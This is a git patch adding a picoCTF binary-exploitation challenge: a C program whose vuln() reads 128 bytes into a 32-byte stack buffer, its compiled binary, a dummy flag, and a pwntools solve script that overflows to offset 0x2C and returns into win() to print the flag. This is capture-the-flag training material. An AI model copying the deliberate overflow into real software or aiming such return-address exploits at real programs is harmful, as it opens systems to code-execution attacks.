From 4e2a7264425a2eca4c8875dd45001c70db67d24e Mon Sep 17 00:00:00 2001 From: h7x4 Date: Thu, 2 Jul 2026 08:34:41 +0900 Subject: [PATCH] pwn/echo_escape_2 --- pwn/echo_escape_2/flag.txt | 1 + pwn/echo_escape_2/solve.py | 33 +++++++++++++++++++++++++++++++++ pwn/echo_escape_2/vuln | Bin 0 -> 15816 bytes pwn/echo_escape_2/vuln.c | 34 ++++++++++++++++++++++++++++++++++ 4 files changed, 68 insertions(+) create mode 100644 pwn/echo_escape_2/flag.txt create mode 100755 pwn/echo_escape_2/solve.py create mode 100755 pwn/echo_escape_2/vuln create mode 100644 pwn/echo_escape_2/vuln.c diff --git a/pwn/echo_escape_2/flag.txt b/pwn/echo_escape_2/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/echo_escape_2/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/echo_escape_2/solve.py b/pwn/echo_escape_2/solve.py new file mode 100755 index 0000000..17034d0 --- /dev/null +++ b/pwn/echo_escape_2/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "dolphin-cove.picoctf.net 56430".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + r.recvuntil(b'Enter the secret key: ').decode() + + offset = 0x2C + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.win() + r.sendline(rop.chain()) + print(r.recvline_contains(b'picoCTF').decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/echo_escape_2/vuln b/pwn/echo_escape_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..63a9450ff7d8ed64448711aaa8fc2e73d0c1ef4c GIT binary patch literal 15816 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 literal 0 HcmV?d00001 diff --git a/pwn/echo_escape_2/vuln.c b/pwn/echo_escape_2/vuln.c new file mode 100644 index 0000000..a559bf9 --- /dev/null +++ b/pwn/echo_escape_2/vuln.c @@ -0,0 +1,34 @@ +#include +#include +#include + +void win() { + FILE *fp = fopen("flag.txt", "r"); + if (!fp) { + perror("[!] Could not open flag.txt"); + exit(1); + } + + char flag[128]; + fgets(flag, sizeof(flag), fp); + printf("Flag: %s\n", flag); + fflush(stdout); + fclose(fp); +} + +void vuln() { + char buf[32]; + + printf("Enter the secret key: "); + fflush(stdout); + + fgets(buf, 128, stdin); + + printf("You entered:, %s\n", buf); +} + +int main() { + vuln(); + puts("Goodbye!"); + return 0; +}